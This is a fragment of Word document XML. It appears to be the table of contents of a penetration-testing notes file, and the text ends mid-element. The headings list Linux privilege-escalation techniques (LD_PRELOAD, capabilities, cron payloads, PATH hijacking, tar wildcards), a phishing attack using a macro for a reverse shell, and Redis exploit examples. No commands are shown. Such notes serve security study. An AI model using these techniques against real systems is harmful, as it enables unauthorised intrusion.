        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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m6db4o8ccn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 -l</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013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dl2mzjyo2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LD_PRELOAD (environment variable)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013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xvbt12sz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LD_Library_PATH (environment variable)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013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xb2attotb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root shell if a file from sudo -l doesn't exist or you can overwrite it</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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fq1sasegyz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Capabilities</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013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3u81t5hw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Capabilities explanation</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013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fywprxlcny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Capabilities enumeration and exploitation</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013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y2v5sn4nsw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exploit capabilities</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013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67prv7aa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Exploiting python capabilities</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014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sxws92cycq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Cron Jobs</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014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4w4k8qm2c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 Jobs info</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014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1n8dqqfbh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PATH variable for unspecified absolute paths to executables ran by cron</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014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dsm8fnk1t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Cron Job Payloads</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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4cii6z5dw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Understanding structure of /etc/crontab</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014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p0qj8tdhf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cron jobs</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014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2h7evnnr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Replacing a file being run as root using bash (found via pspy64)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014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gbyzxqp8y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Putting malicious file in PATH with high priority (/usr/bin/local)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014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42c4y6uh5h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Adding malicious missing .so file by putting in directory that is part of LD_LIBRARY_PATH path</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014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07b5qjsht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7zip wildcard PE</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014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vfkyewr45j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Bash Gobbling or Linux tar wildcard (globbing)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014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m8t2grxev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Example1 of Bash Gobbling or Linux tar wildcard</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014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84wh2izqb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Example2 of Bash gobbling or Linux tar wildcard (with SUDO) (/usr/bin/tar)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014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kusyqm6v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Example3 of Bash gobbling or Linux tar wildcard</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014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i2o9p87ft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Examples of files ran by cron jobs (to help build intuition for identifying them)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014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x92539ms9b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directory to my path on Kali</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015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nemcjhizuo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Permanently:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015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taagdzcks2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Temporarily:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015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ygci8556ve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PATH environment</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015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eu1yx552ce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PATH environment variable hijacking</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015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mofjim6j3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tell if a binary/command is hijackable</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015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5vuh9iyaf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example with custom script (with SUID bit set) calling chpasswd but without full path</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015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r25cl151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 example with root cron job calling whoami without full path</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015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tcgqzlly8n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check environment variables</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015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rjm5tyeypl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Phishing</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015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438rotc68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Phishing Attack Example</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015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gpk2rx7x4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Prerequisites for this phishing attack</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015B">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du9g7wd60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Webadv explained</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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i37hc4e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phishing example (with malicious ODS file containing a macro for a reverse shell)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015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qx3k1hl133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phishing example (sending email with keywords and putting our http://&lt;IP&gt; in email)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015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a4puqout91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SMTP</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015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po9xv1ycx6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POP3</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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xjbcgormmk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IMAP</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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hamnm9su6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Dealing with multiple mailboxes/folders and sub folders</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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250q8ytwjl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POP3, IMAP, and SMTP</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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0k7rrv8jb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Explaining Each</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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hr2y9luau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Here is a guide below on how to read mail (via IMAP port 143) using telnet</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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p34kouyt0e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Mail</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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x5mrasxotv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Nmap</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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ndhtusxeky9">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IP of target machine (using netdiscover)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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s7ktu12bpk1">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Redis</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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h4s83kelu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 Exploit Example 1</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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orejl15ud0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 Exploit Example 2</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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uj3g7y7wy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Redis Exploit Example 3</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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0qbzusr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TFTP</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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7d1exrqh00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Curl</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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womrfu1wl49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Enum4Linux (external enumeration tool)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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dj1xoj5t9x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General Enumeration</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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frxhkmlmvd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Network Enumeration</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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cy07ruiij2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Firewall enumeration</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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qaushfija2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 Enumeration</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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6fk0d8e0ec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Version of software on website</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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jjy5ypewzo">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Searchsploit</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
